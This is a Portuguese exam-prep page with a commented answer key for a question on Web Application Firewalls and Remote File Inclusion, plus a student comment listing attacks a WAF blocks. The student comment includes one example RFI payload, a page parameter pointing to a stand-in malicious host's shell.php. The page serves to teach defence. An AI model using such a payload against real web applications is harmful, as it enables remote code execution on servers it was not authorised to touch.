Um firewall do tipo WAF oferecido por um provedor de serviç...
Gabarito comentado
Confira o gabarito comentado por um dos nossos professores
Para compreender melhor o tema central da questão, precisamos entender o conceito de Remote File Inclusion (RFI). Este é um tipo de ataque que afeta aplicações web, permitindo que um atacante inclua remotamente um arquivo no servidor. Esse arquivo geralmente contém código malicioso, que pode ser executado no servidor comprometido. Essa vulnerabilidade é explorada quando a aplicação web não valida adequadamente as entradas do usuário, permitindo que URLs externas sejam inseridas como se fossem locais de arquivo legítimos.
Alternativa Correta: A
A alternativa A está correta pois descreve precisamente o mecanismo de um ataque RFI. Ao fazer uma aplicação web baixar arquivos de código-fonte maliciosos e possivelmente executá-los no servidor, um atacante pode comprometer o sistema, causando vazamento de dados, instalação de backdoors ou tomada de controle do servidor. Esse tipo de ataque é muito perigoso e exige uma configuração adequada de segurança para mitigação.
Análise das Alternativas Incorretas:
- B: A injeção de código SQL se refere a um ataque conhecido como SQL Injection, que é diferente do Remote File Inclusion. Ele envolve a inserção de código SQL malicioso em formulários web para manipular o banco de dados.
- C: O "sequestro" (hijacking) de uma sessão refere-se à captura de uma sessão ativa, normalmente descrito como Session Hijacking. Este é um ataque diferente, focado em roubar a sessão de um usuário legítimo.
- D: Sobrecarregar um servidor web pode estar relacionado a um ataque de Denial of Service (DoS), onde o objetivo é tirar o serviço do ar através de sobrecarga, mas isso não é característico de um Remote File Inclusion.
- E: Introduzir código malicioso client-side é uma técnica usada em ataques de Cross-Site Scripting (XSS), onde o código é executado no navegador da vítima, não no servidor.
Ao analisar questões dessa natureza, é importante identificar palavras-chave que apontam para o tipo de ataque em questão e lembrar-se das definições específicas. Treinar o reconhecimento dessas características ajuda a evitar confusões e escolher a alternativa correta com mais segurança.
Gostou do comentário? Deixe sua avaliação aqui embaixo!
Clique para visualizar este gabarito
Visualize o gabarito desta questão clicando no botão abaixo
Comentários
Veja os comentários dos nossos alunos
Um WAF (Web Application Firewall), como os oferecidos em serviços de nuvem (AWS WAF, Azure WAF, Cloudflare), possui regras predefinidas para bloquear tentativas de:
- RFI;
- SQL Injection;
- XSS;
- Command Injection;
- Path Traversal;
- File Inclusion (RFI/LFI).
Ele atua como uma barreira entre o cliente e o servidor, inspecionando requisições HTTP e bloqueando padrões maliciosos com base em assinaturas ou regras personalizadas.
Remote File Inclusion (RFI): Refere-se à inclusão remota de arquivos, usualmente através de scripts no servidores web. Isso é feito por meio de um parâmetro mal validado (ex: ?page=http://malicious-site.com/shell.php), que pode levar à execução arbitrária de código.
Uma causa comum pode ser o uso de include() ou require() em PHP com entrada de usuário sem validação adequada. Esse ataque permite que o atacante hospede um arquivo malicioso e o faça ser incluído e executado pela aplicação vulnerável.
b) SQL Injection
c) Session Hijacking
d) DoS (Denial of Service)
e) Cross-Site Scripting (XSS)
Clique para visualizar este comentário
Visualize os comentários desta questão clicando no botão abaixo